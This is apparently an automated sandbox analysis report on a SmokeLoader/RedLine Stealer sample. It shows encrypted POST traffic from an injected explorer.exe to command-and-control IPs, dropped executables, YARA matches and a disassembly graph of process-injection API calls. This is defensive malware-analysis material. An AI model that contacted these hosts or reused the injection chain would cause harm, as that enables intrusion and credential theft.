                                              2024-07-23 04:18:47 UTC1267OUTData Raw: 69 34 73 6a 70 6c 37 71 44 73 48 48 44 61 44 49 42 65 6a 44 35 44 46 34 53 5a 41 6c 68 6d 76 4f 77 37 6b 48 32 49 37 69 71 57 56 6d 6e 30 67 42 4b 71 66 6c 75 50 57 74 54 68 30 6c 63 38 49 4f 43 70 47 74 4b 38 38 34 34 71 66 6b 6d 36 35 56 70 2f 35 44 35 39 66 50 5a 43 77 5a 33 5a 52 50 4c 4a 45 69 55 69 50 74 41 42 6b 44 35 55 73 50 7a 75 31 76 55 2b 6f 66 6e 48 53 37 38 7a 5a 43 75 73 47 53 39 63 36 71 75 78 49 6d 50 50 54 74 66 54 48 45 43 39 2b 78 51 34 78 58 67 56 4d 7a 33 42 31 65 59 37 4a 4f 69 39 2f 63 43 6e 6c 6a 58 32 4d 77 5a 55 75 62 6f 4e 50 72 4a 79 7a 6f 63 4e 30 47 35 39 2b 49 6b 33 55 36 33 71 54 37 6b 31 55 55 62 39 62 45 46 35 73 4d 4f 69 34 6b 39 67 58 66 62 68 5a 66 76 38 6c 2b 75 4f 2b 49 36 33 77 55 62 48 77 47 4c 37 42 7a 64 61 48
                                              Data Ascii: i4sjpl7qDsHHDaDIBejD5DF4SZAlhmvOw7kH2I7iqWVmn0gBKqfluPWtTh0lc8IOCpGtK8844qfkm65Vp/5D59fPZCwZ3ZRPLJEiUiPtABkD5UsPzu1vU+ofnHS78zZCusGS9c6quxImPPTtfTHEC9+xQ4xXgVMz3B1eY7JOi9/cCnljX2MwZUuboNPrJyzocN0G59+Ik3U63qT7k1UUb9bEF5sMOi4k9gXfbhZfv8l+uO+I63wUbHwGL7BzdaH
                                              2024-07-23 04:18:48 UTC137INHTTP/1.1 200 OK
                                              Content-Length: 685
                                              Date: Tue, 23 Jul 2024 04:18:48 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Connection: close
                                              2024-07-23 04:18:48 UTC685INData Raw: 55 6a 44 4a 58 4e 6c 65 72 72 75 41 6a 72 31 32 47 37 69 5a 48 56 56 2b 46 73 56 72 7a 48 7a 43 30 43 42 66 6d 6b 49 4b 39 74 6c 33 54 48 35 47 65 46 6f 51 51 58 4b 52 49 67 78 54 7a 52 41 43 46 6d 68 4a 6c 72 6a 4b 41 45 76 5a 52 66 35 70 61 6c 77 58 30 4d 30 71 64 4e 4f 51 4b 33 77 50 75 2f 72 63 2f 2f 4c 4b 76 59 64 65 41 4b 2b 79 69 76 46 31 6b 43 76 38 63 6c 42 4d 42 52 4d 48 74 75 34 7a 6d 32 43 61 49 47 65 6d 72 38 30 66 65 54 2b 79 64 51 4f 46 64 43 75 79 57 37 64 7a 7a 42 6d 4e 72 79 4b 78 4e 43 5a 44 72 56 2f 45 6b 66 69 6a 6c 54 7a 52 42 55 35 31 59 73 58 75 50 46 6c 45 6b 55 72 4b 6c 61 72 59 79 77 4d 67 76 6a 64 37 78 70 58 63 6b 56 47 56 4e 42 4b 6e 77 6f 77 47 63 51 32 36 74 52 74 56 57 48 48 68 46 6c 69 6d 74 42 79 59 4c 6c 46 51 47 4e 68
                                              Data Ascii: UjDJXNlerruAjr12G7iZHVV+FsVrzHzC0CBfmkIK9tl3TH5GeFoQQXKRIgxTzRACFmhJlrjKAEvZRf5palwX0M0qdNOQK3wPu/rc//LKvYdeAK+yivF1kCv8clBMBRMHtu4zm2CaIGemr80feT+ydQOFdCuyW7dzzBmNryKxNCZDrV/EkfijlTzRBU51YsXuPFlEkUrKlarYywMgvjd7xpXckVGVNBKnwowGcQ26tRtVWHHhFlimtByYLlFQGNh


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              18192.168.2.549762107.173.160.1394431028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              2024-07-23 04:18:49 UTC234OUTPOST / HTTP/1.1
                                              Host: 107.173.160.139
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Connection: close
                                              Content-Type: text/plain
                                              Content-Length: 1267
                                              2024-07-23 04:18:49 UTC1267OUTData Raw: 6b 4d 42 42 69 71 41 30 47 72 49 72 2b 67 54 76 44 31 4c 51 43 4d 73 2b 69 35 79 32 6d 4c 70 4a 6b 59 4a 31 59 6a 45 38 79 2b 68 43 32 34 33 69 61 72 41 52 33 33 57 55 41 54 34 48 6e 65 37 47 5a 45 53 78 51 7a 79 54 66 76 38 6e 2f 73 4d 4c 73 6b 6f 68 38 65 44 4f 35 4c 4d 30 75 73 39 63 4a 2b 38 79 4e 75 64 67 64 5a 66 66 4f 30 2b 49 4a 38 55 6f 41 36 6a 30 48 6e 79 59 4e 54 7a 63 79 4a 6e 65 41 4b 35 71 58 79 76 6d 59 52 72 67 61 73 4b 59 4a 43 4d 63 76 31 63 58 57 5a 6b 32 48 77 4c 73 53 6e 37 66 47 34 4c 71 66 53 54 6d 34 33 6c 42 66 6b 37 4e 6d 36 2b 5a 4a 79 2f 52 35 5a 44 75 2b 61 39 71 55 44 47 4d 45 6a 49 49 53 4a 48 70 53 2b 38 6c 70 59 6c 6f 32 6d 41 58 44 59 37 6a 4e 59 6f 70 35 32 6e 30 64 63 6b 49 70 32 33 37 62 39 32 69 65 36 59 6a 39 72 74
                                              Data Ascii: kMBBiqA0GrIr+gTvD1LQCMs+i5y2mLpJkYJ1YjE8y+hC243iarAR33WUAT4Hne7GZESxQzyTfv8n/sMLskoh8eDO5LM0us9cJ+8yNudgdZffO0+IJ8UoA6j0HnyYNTzcyJneAK5qXyvmYRrgasKYJCMcv1cXWZk2HwLsSn7fG4LqfSTm43lBfk7Nm6+ZJy/R5ZDu+a9qUDGMEjIISJHpS+8lpYlo2mAXDY7jNYop52n0dckIp237b92ie6Yj9rt
                                              2024-07-23 04:18:51 UTC137INHTTP/1.1 200 OK
                                              Content-Length: 685
                                              Date: Tue, 23 Jul 2024 04:18:50 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Connection: close
                                              2024-07-23 04:18:51 UTC685INData Raw: 51 68 54 5a 70 53 47 2f 55 69 30 51 77 36 5a 6c 48 4b 54 47 43 4e 67 46 31 57 4d 78 71 33 67 42 49 72 6c 36 68 46 6b 51 6d 53 57 70 47 31 72 39 4b 52 31 59 47 62 77 48 72 46 6f 57 44 41 35 2f 54 68 56 62 4c 48 45 50 67 78 30 36 72 30 4d 4c 70 78 67 55 66 75 69 55 48 49 4a 5a 50 66 53 50 2f 62 39 53 6b 41 42 6a 61 53 41 57 6f 71 70 4e 32 78 33 37 6a 75 70 2b 6a 51 72 75 34 44 49 35 53 75 69 2f 4c 72 6a 7a 6e 4c 4f 6f 4f 42 59 2f 48 62 6c 2b 41 41 6e 70 54 51 30 68 63 52 4a 54 57 6b 6d 49 61 4a 55 6f 75 6b 4a 79 7a 69 6b 6d 6f 35 74 37 6d 75 56 33 36 47 72 2f 64 67 4f 6d 6c 61 57 68 2f 7a 79 63 70 43 39 34 33 36 57 64 67 66 59 72 79 59 67 50 48 4d 47 41 63 6d 45 6d 61 61 43 32 43 43 32 66 35 50 79 44 6c 30 52 61 50 6f 47 74 2f 76 67 68 70 45 45 6f 31 61 51
                                              Data Ascii: QhTZpSG/Ui0Qw6ZlHKTGCNgF1WMxq3gBIrl6hFkQmSWpG1r9KR1YGbwHrFoWDA5/ThVbLHEPgx06r0MLpxgUfuiUHIJZPfSP/b9SkABjaSAWoqpN2x37jup+jQru4DI5Sui/LrjznLOoOBY/Hbl+AAnpTQ0hcRJTWkmIaJUoukJyzikmo5t7muV36Gr/dgOmlaWh/zycpC9436WdgfYryYgPHMGAcmEmaaC2CC2f5PyDl0RaPoGt/vghpEEo1aQ


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              19192.168.2.549764167.235.128.1534431028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              2024-07-23 04:18:52 UTC234OUTPOST / HTTP/1.1
                                              Host: 167.235.128.153
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Connection: close
                                              Content-Type: text/plain
                                              Content-Length: 1122
                                              2024-07-23 04:18:52 UTC1122OUTData Raw: 54 35 76 48 62 57 4e 77 6b 74 59 74 46 69 64 75 34 49 61 55 76 6c 62 30 4a 56 43 39 53 6b 78 52 52 33 54 30 44 68 64 77 59 6e 61 49 42 6f 49 36 4b 32 51 61 57 75 6b 6c 76 67 55 63 62 49 62 6b 50 79 4f 6c 46 6e 37 4f 6f 39 54 2f 73 48 30 34 5a 72 30 58 59 48 6c 61 4e 78 49 78 5a 38 7a 77 71 52 6d 58 63 76 43 32 4e 54 6f 36 50 48 72 61 70 73 34 38 2f 6c 57 77 39 6c 48 4b 4b 4b 43 36 4a 71 31 33 79 34 41 68 79 67 30 55 6a 41 32 6a 46 6e 4f 41 63 62 6d 66 58 2b 56 39 6a 48 49 77 51 70 37 32 53 37 73 70 37 68 53 72 79 4d 66 2f 35 48 2b 6b 4f 59 31 59 77 69 77 54 39 73 57 73 49 53 50 46 71 43 4f 5a 56 32 64 43 41 59 4c 63 72 66 77 44 35 6f 31 44 38 56 6a 46 41 67 4d 36 4b 6d 70 73 57 30 48 7a 68 48 30 6d 6b 72 59 50 49 6b 46 69 4f 6a 5a 33 73 78 4d 45 66 61 53
                                              Data Ascii: T5vHbWNwktYtFidu4IaUvlb0JVC9SkxRR3T0DhdwYnaIBoI6K2QaWuklvgUcbIbkPyOlFn7Oo9T/sH04Zr0XYHlaNxIxZ8zwqRmXcvC2NTo6PHraps48/lWw9lHKKKC6Jq13y4Ahyg0UjA2jFnOAcbmfX+V9jHIwQp72S7sp7hSryMf/5H+kOY1YwiwT9sWsISPFqCOZV2dCAYLcrfwD5o1D8VjFAgM6KmpsW0HzhH0mkrYPIkFiOjZ3sxMEfaS
                                              2024-07-23 04:18:53 UTC137INHTTP/1.1 200 OK
                                              Content-Length: 685
                                              Date: Tue, 23 Jul 2024 04:18:53 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Connection: close
                                              2024-07-23 04:18:53 UTC685INData Raw: 61 4a 68 31 72 70 54 49 68 4f 30 73 6c 4a 77 63 42 55 54 30 69 61 66 49 4a 79 53 54 47 43 53 6e 44 79 6c 35 6e 42 50 38 6b 42 49 6b 53 6d 39 46 42 36 63 41 52 69 45 2f 72 69 36 45 68 68 50 74 6b 79 50 78 36 4c 6a 79 32 74 66 39 47 47 51 4e 36 38 46 79 6c 68 46 4c 39 38 34 78 2b 2b 4f 6a 70 4f 76 59 66 42 46 75 76 69 6a 37 6b 79 75 53 2f 57 6b 42 46 4f 68 45 7a 6a 6e 61 63 76 6c 49 5a 48 38 32 53 6b 45 74 62 57 6c 68 63 47 6c 53 49 53 6c 61 72 2f 45 72 44 36 4a 38 37 53 72 53 64 42 31 72 37 47 5a 42 68 76 46 47 61 2f 4b 6a 4a 41 38 73 41 4e 74 79 6f 36 70 44 6e 55 38 41 44 70 6d 36 70 58 4f 65 75 79 71 58 75 58 58 63 61 6a 79 5a 6d 58 54 43 46 70 2b 44 78 43 45 37 50 4d 68 48 33 59 61 54 4e 54 34 66 73 42 63 48 6a 6b 52 4a 66 6c 54 54 79 4a 4b 44 62 49 72
                                              Data Ascii: aJh1rpTIhO0slJwcBUT0iafIJySTGCSnDyl5nBP8kBIkSm9FB6cARiE/ri6EhhPtkyPx6Ljy2tf9GGQN68FylhFL984x++OjpOvYfBFuvij7kyuS/WkBFOhEzjnacvlIZH82SkEtbWlhcGlSISlar/ErD6J87SrSdB1r7GZBhvFGa/KjJA8sANtyo6pDnU8ADpm6pXOeuyqXuXXcajyZmXTCFp+DxCE7PMhH3YaTNT4fsBcHjkRJflTTyJKDbIr


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              20192.168.2.549765107.173.160.1374431028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              2024-07-23 04:18:54 UTC234OUTPOST / HTTP/1.1
                                              Host: 107.173.160.137
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Connection: close
                                              Content-Type: text/plain
                                              Content-Length: 1122
                                              2024-07-23 04:18:54 UTC1122OUTData Raw: 4f 6a 4a 51 41 6b 34 48 2f 66 53 35 5a 4a 64 66 33 51 78 54 33 42 39 53 52 74 30 50 59 6b 6e 45 2f 77 73 77 4a 58 2b 47 4c 6f 76 51 57 55 38 66 6f 77 38 4a 6d 56 6b 74 6a 66 46 77 6c 58 78 61 52 49 63 48 6a 76 61 75 57 74 44 36 45 36 6e 68 4f 56 76 78 63 71 36 49 30 4a 52 6c 78 4e 48 47 34 30 63 4e 66 4a 76 30 49 49 75 71 2b 31 61 56 73 4c 64 37 49 49 61 79 56 67 6b 53 32 2f 79 75 2f 34 47 79 4f 2b 37 57 69 2b 47 77 36 46 79 65 51 76 63 50 36 59 63 33 61 4f 56 2f 32 6a 4e 2b 34 49 65 51 39 5a 33 6a 72 4b 72 59 68 35 64 50 77 58 43 47 65 4f 63 52 52 54 42 72 72 54 66 30 4e 36 35 4a 56 42 72 44 77 4b 6e 4f 77 6a 68 41 4d 75 4b 7a 4c 4e 4a 44 69 38 61 72 6e 2b 49 78 53 41 62 56 70 4e 74 42 5a 66 61 5a 70 31 71 64 6b 43 34 42 7a 6e 58 50 67 44 77 75 30 42 51
                                              Data Ascii: OjJQAk4H/fS5ZJdf3QxT3B9SRt0PYknE/wswJX+GLovQWU8fow8JmVktjfFwlXxaRIcHjvauWtD6E6nhOVvxcq6I0JRlxNHG40cNfJv0IIuq+1aVsLd7IIayVgkS2/yu/4GyO+7Wi+Gw6FyeQvcP6Yc3aOV/2jN+4IeQ9Z3jrKrYh5dPwXCGeOcRRTBrrTf0N65JVBrDwKnOwjhAMuKzLNJDi8arn+IxSAbVpNtBZfaZp1qdkC4BznXPgDwu0BQ
                                              2024-07-23 04:18:55 UTC137INHTTP/1.1 200 OK
                                              Content-Length: 685
                                              Date: Tue, 23 Jul 2024 04:18:55 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Connection: close
                                              2024-07-23 04:18:55 UTC685INData Raw: 5a 76 70 49 77 47 68 52 46 58 47 33 35 64 7a 43 78 6a 6e 46 46 69 65 6d 6a 68 45 56 55 41 43 50 43 39 47 79 49 63 62 43 45 38 67 49 34 48 31 76 43 78 45 75 74 30 2b 43 61 2f 62 39 38 37 6b 74 69 38 56 69 34 69 77 6a 6b 30 63 70 67 6c 79 53 43 2b 6f 64 53 33 54 68 78 39 45 62 79 34 4c 59 71 58 79 76 4a 4b 4d 4a 44 4a 57 73 38 34 41 73 73 2f 6f 70 69 70 54 37 41 35 4b 4d 30 52 53 67 42 54 54 73 49 6a 50 78 39 78 31 38 44 51 4f 59 6b 68 68 57 78 37 76 42 6c 4d 58 69 2f 36 6b 4c 70 45 46 56 33 6a 6c 59 63 4b 66 42 62 79 51 44 62 70 6a 30 69 52 51 33 79 35 65 30 79 65 30 77 2b 53 35 65 46 52 4f 52 39 7a 38 78 32 64 43 7a 55 32 2f 34 4a 7a 52 31 51 34 62 30 65 52 35 76 4e 43 32 4a 51 53 2f 6a 62 79 57 6d 33 55 4c 34 42 45 5a 58 37 2b 7a 52 4f 6f 70 58 39 71 79
                                              Data Ascii: ZvpIwGhRFXG35dzCxjnFFiemjhEVUACPC9GyIcbCE8gI4H1vCxEut0+Ca/b987kti8Vi4iwjk0cpglySC+odS3Thx9Eby4LYqXyvJKMJDJWs84Ass/opipT7A5KM0RSgBTTsIjPx9x18DQOYkhhWx7vBlMXi/6kLpEFV3jlYcKfBbyQDbpj0iRQ3y5e0ye0w+S5eFROR9z8x2dCzU2/4JzR1Q4b0eR5vNC2JQS/jbyWm3UL4BEZX7+zROopX9qy


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              21192.168.2.549766107.173.160.1394431028C:\Windows\explorer.exe
                                              TimestampBytes transferredDirectionData
                                              2024-07-23 04:18:56 UTC234OUTPOST / HTTP/1.1
                                              Host: 107.173.160.139
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                              Connection: close
                                              Content-Type: text/plain
                                              Content-Length: 1122
                                              2024-07-23 04:18:56 UTC1122OUTData Raw: 46 4e 68 4b 34 6f 6b 39 57 50 54 77 6c 4f 59 61 49 69 58 42 4a 37 7a 52 57 36 55 47 65 4b 61 68 73 7a 47 2b 6a 61 59 52 5a 6f 51 43 63 78 34 36 72 56 39 41 71 31 6e 41 43 4d 6d 36 56 72 65 62 4f 51 63 59 69 79 74 4b 37 70 64 31 2b 66 51 67 4e 39 58 72 55 71 56 4d 62 62 4a 42 31 4f 44 37 67 6e 4e 31 42 63 55 6b 50 64 4f 42 72 71 56 4e 4f 41 67 37 30 5a 67 2f 39 34 75 67 39 4e 57 31 72 68 73 31 43 2b 4c 6c 46 4f 37 50 50 46 7a 66 69 43 59 2f 76 44 66 46 6e 4e 6d 7a 41 4f 50 58 2f 65 46 61 61 4a 5a 59 51 4f 6e 34 67 75 61 41 4b 71 76 7a 79 74 72 41 48 51 4e 74 4d 4e 67 48 57 2f 45 43 2b 55 4a 6e 39 45 69 4f 37 53 76 31 44 2b 32 69 65 51 51 69 51 58 5a 48 57 4e 38 31 78 62 4a 74 4a 6a 57 30 72 37 4e 4b 46 6b 64 48 41 32 7a 68 72 47 71 6f 68 64 6d 55 62 37 55
                                              Data Ascii: FNhK4ok9WPTwlOYaIiXBJ7zRW6UGeKahszG+jaYRZoQCcx46rV9Aq1nACMm6VrebOQcYiytK7pd1+fQgN9XrUqVMbbJB1OD7gnN1BcUkPdOBrqVNOAg70Zg/94ug9NW1rhs1C+LlFO7PPFzfiCY/vDfFnNmzAOPX/eFaaJZYQOn4guaAKqvzytrAHQNtMNgHW/EC+UJn9EiO7Sv1D+2ieQQiQXZHWN81xbJtJjW0r7NKFkdHA2zhrGqohdmUb7U


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:00:14:53
                                              Start date:23/07/2024
                                              Path:C:\Users\user\Desktop\file.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\file.exe"
                                              Imagebase:0x400000
                                              File size:155'648 bytes
                                              MD5 hash:D76C718ADA43477786EF9CA3BBA29842
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2121442892.0000000000846000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2121068064.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2121068064.00000000005C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2121025538.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2121164273.00000000005F1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2121164273.00000000005F1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:2
                                              Start time:00:15:04
                                              Start date:23/07/2024
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Explorer.EXE
                                              Imagebase:0x7ff674740000
                                              File size:5'141'208 bytes
                                              MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              General

                                              Target ID:4
                                              Start time:00:15:24
                                              Start date:23/07/2024
                                              Path:C:\Users\user\AppData\Roaming\ajjwvsd
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Roaming\ajjwvsd
                                              Imagebase:0x400000
                                              File size:155'648 bytes
                                              MD5 hash:D76C718ADA43477786EF9CA3BBA29842
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.2409729283.00000000021B1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.2409729283.00000000021B1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.2409361808.0000000000467000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.2409488950.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.2409488950.00000000005B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.2409462213.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                              Antivirus matches:
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 39%, ReversingLabs
                                              • Detection: 41%, Virustotal, Browse
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:7
                                              Start time:00:16:16
                                              Start date:23/07/2024
                                              Path:C:\Users\user\AppData\Local\Temp\C9F5.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Users\user\AppData\Local\Temp\C9F5.exe
                                              Imagebase:0x7ff7d5060000
                                              File size:988'672 bytes
                                              MD5 hash:2B3ECC21382E825D6FE0812A717717EB
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Antivirus matches:
                                              • Detection: 100%, Joe Sandbox ML
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:8
                                              Start time:00:16:16
                                              Start date:23/07/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6d64d0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:9
                                              Start time:00:17:39
                                              Start date:23/07/2024
                                              Path:C:\Users\user\AppData\Local\Temp\C9F5.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Users\user\AppData\Local\Temp\C9F5.exe"
                                              Imagebase:0x7ff7d5060000
                                              File size:988'672 bytes
                                              MD5 hash:2B3ECC21382E825D6FE0812A717717EB
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:10
                                              Start time:00:17:40
                                              Start date:23/07/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6d64d0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:11
                                              Start time:00:17:48
                                              Start date:23/07/2024
                                              Path:C:\Users\user\AppData\Local\Temp\C9F5.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Users\user\AppData\Local\Temp\C9F5.exe"
                                              Imagebase:0x7ff7d5060000
                                              File size:988'672 bytes
                                              MD5 hash:2B3ECC21382E825D6FE0812A717717EB
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:12
                                              Start time:00:17:48
                                              Start date:23/07/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6d64d0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Disassembly

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:8.8%
                                                Dynamic/Decrypted Code Coverage:21.6%
                                                Signature Coverage:51.5%
                                                Total number of Nodes:134
                                                Total number of Limit Nodes:5
                                                execution_graph 3887 401543 3898 401546 3887->3898 3888 4015e6 NtDuplicateObject 3889 401603 NtCreateSection 3888->3889 3894 401702 3888->3894 3890 401683 NtCreateSection 3889->3890 3891 401629 NtMapViewOfSection 3889->3891 3892 4016af 3890->3892 3890->3894 3891->3890 3893 40164c NtMapViewOfSection 3891->3893 3892->3894 3896 4016b9 NtMapViewOfSection 3892->3896 3893->3890 3895 40166a 3893->3895 3895->3890 3896->3894 3897 4016e0 NtMapViewOfSection 3896->3897 3897->3894 3898->3888 3898->3894 3955 402e63 3956 402e67 3955->3956 3957 401918 8 API calls 3956->3957 3958 402f44 3956->3958 3957->3958 3947 401924 3948 401929 3947->3948 3949 40195e Sleep 3948->3949 3950 401979 3949->3950 3951 401538 7 API calls 3950->3951 3952 40198a 3950->3952 3951->3952 3794 5b003c 3795 5b0049 3794->3795 3807 5b0e0f SetErrorMode SetErrorMode 3795->3807 3800 5b0265 3801 5b02ce VirtualProtect 3800->3801 3803 5b030b 3801->3803 3802 5b0439 VirtualFree 3806 5b04be LoadLibraryA 3802->3806 3803->3802 3805 5b08c7 3806->3805 3808 5b0223 3807->3808 3809 5b0d90 3808->3809 3810 5b0dad 3809->3810 3811 5b0dbb GetPEB 3810->3811 3812 5b0238 VirtualAlloc 3810->3812 3811->3812 3812->3800 3835 402fe9 3836 403140 3835->3836 3837 403013 3835->3837 3837->3836 3838 4030ce RtlCreateUserThread NtTerminateProcess 3837->3838 3838->3836 3953 5b092b GetPEB 3954 5b0972 3953->3954 3747 417e97 3750 417c57 3747->3750 3749 417e9c 3751 417c74 3750->3751 3752 417cd1 6 API calls 3751->3752 3753 417d38 3751->3753 3754 417d1e 3752->3754 3755 417d3d GetCommMask GetLastError 3753->3755 3754->3753 3756 417d57 ZombifyActCtx 3755->3756 3757 417d5e GetConsoleAliasesW 3755->3757 3756->3757 3757->3755 3758 417d70 3757->3758 3759 417d7c OpenWaitableTimerW CreateWaitableTimerW 3758->3759 3762 417db1 3758->3762 3759->3762 3761 417de5 LoadLibraryA 3771 4179ea 3761->3771 3770 4179ad LocalAlloc 3762->3770 3767 417e48 3776 417bd2 3767->3776 3769 417e4d 3769->3749 3770->3761 3772 417a29 3771->3772 3773 417a35 GetModuleHandleW GetProcAddress 3772->3773 3774 417b0b 3772->3774 3773->3772 3775 4179cc VirtualProtect 3774->3775 3775->3767 3777 417c1d 3776->3777 3778 417bfe ReadEventLogW 3776->3778 3785 417b30 3777->3785 3778->3777 3781 417c30 FreeEnvironmentStringsA FindFirstVolumeA 3782 417c3f 3781->3782 3788 417b5e 3782->3788 3786 417b41 OpenJobObjectA LoadLibraryW 3785->3786 3787 417b55 3785->3787 3786->3787 3787->3781 3787->3782 3789 417b76 SetUnhandledExceptionFilter 3788->3789 3791 417b81 3788->3791 3789->3791 3792 417bb6 3791->3792 3793 417ba9 Sleep 3791->3793 3792->3769 3793->3791 3869 401496 3870 401447 3869->3870 3870->3869 3871 4015e6 NtDuplicateObject 3870->3871 3877 40152f 3870->3877 3872 401603 NtCreateSection 3871->3872 3871->3877 3873 401683 NtCreateSection 3872->3873 3874 401629 NtMapViewOfSection 3872->3874 3875 4016af 3873->3875 3873->3877 3874->3873 3876 40164c NtMapViewOfSection 3874->3876 3875->3877 3879 4016b9 NtMapViewOfSection 3875->3879 3876->3873 3878 40166a 3876->3878 3878->3873 3879->3877 3880 4016e0 NtMapViewOfSection 3879->3880 3880->3877 3813 402eb7 3815 402eb8 3813->3815 3814 402f44 3815->3814 3817 401918 3815->3817 3818 401929 3817->3818 3819 40195e Sleep 3818->3819 3820 401979 3819->3820 3822 40198a 3820->3822 3823 401538 3820->3823 3822->3814 3824 401539 3823->3824 3825 4015e6 NtDuplicateObject 3824->3825 3831 401702 3824->3831 3826 401603 NtCreateSection 3825->3826 3825->3831 3827 401683 NtCreateSection 3826->3827 3828 401629 NtMapViewOfSection 3826->3828 3829 4016af 3827->3829 3827->3831 3828->3827 3830 40164c NtMapViewOfSection 3828->3830 3829->3831 3833 4016b9 NtMapViewOfSection 3829->3833 3830->3827 3832 40166a 3830->3832 3831->3822 3832->3827 3833->3831 3834 4016e0 